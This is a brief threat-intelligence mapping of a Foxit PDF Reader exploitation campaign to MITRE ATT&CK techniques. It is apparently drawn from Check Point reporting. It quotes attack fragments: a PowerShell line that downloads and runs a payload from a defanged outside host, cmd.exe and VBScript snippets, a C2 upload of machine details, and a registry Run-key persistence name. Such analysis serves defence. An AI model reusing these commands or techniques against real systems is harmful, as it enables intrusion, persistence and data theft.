Foxit PDF Vulnerability Exploitation

MITRE Techniques

• [T1203] Exploitation for Client Execution – The exploit triggers malicious commands via a flawed Foxit Reader design; Check Point notes: “The malicious command is executed once the victim “Agrees” to the default options twice.”
• [T1059.001] PowerShell – The downloader uses PowerShell to download and execute payloads (e.g., “powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxps://…/Client_1.exe’, ‘payload.exe’)””).
• [T1059.003] Windows Command Shell – The execution flow uses cmd.exe to run downloaded commands (e.g., “cmd.exe /c cD %tEMP% …”).
• [T1059.007] VBScript – The infection chain includes VBScript components (e.g., “Sub Main() Dim WShell…”).
• [T1027] Obfuscated/Encrypted/Compressed Files – Strings are encrypted with a custom algorithm (“The malware contains strings important to its functionality and is encrypted with a custom algorithm.”).
• [T1082] System Information Discovery – The downloader gathers machine information (Computer name, User name, IP Address, OS Version) and writes it to a file.
• [T1041] Exfiltration Over C2 Channel – After collecting data, the downloader uploads files to the C2 (e.g., “Content-Type: multipart/form-data… Computer Name: $PC_NAME IP Address: $IP_ADDRESS…”).
• [T1113] Screen Capture – A downloader component references “screen, a tool making screenshots and saves them to the same folder to be picked up by upload.”
• [T1547.001] Registry Run Keys/Startup Folder – Persistence is achieved by copying itself and setting a Run registry value named “TailoredExperiencesWithDiagnosticDataEnabled”.
• [T1001] Data Obfuscation/Encryption – Custom decryption routines decrypt strings and payloads during operation.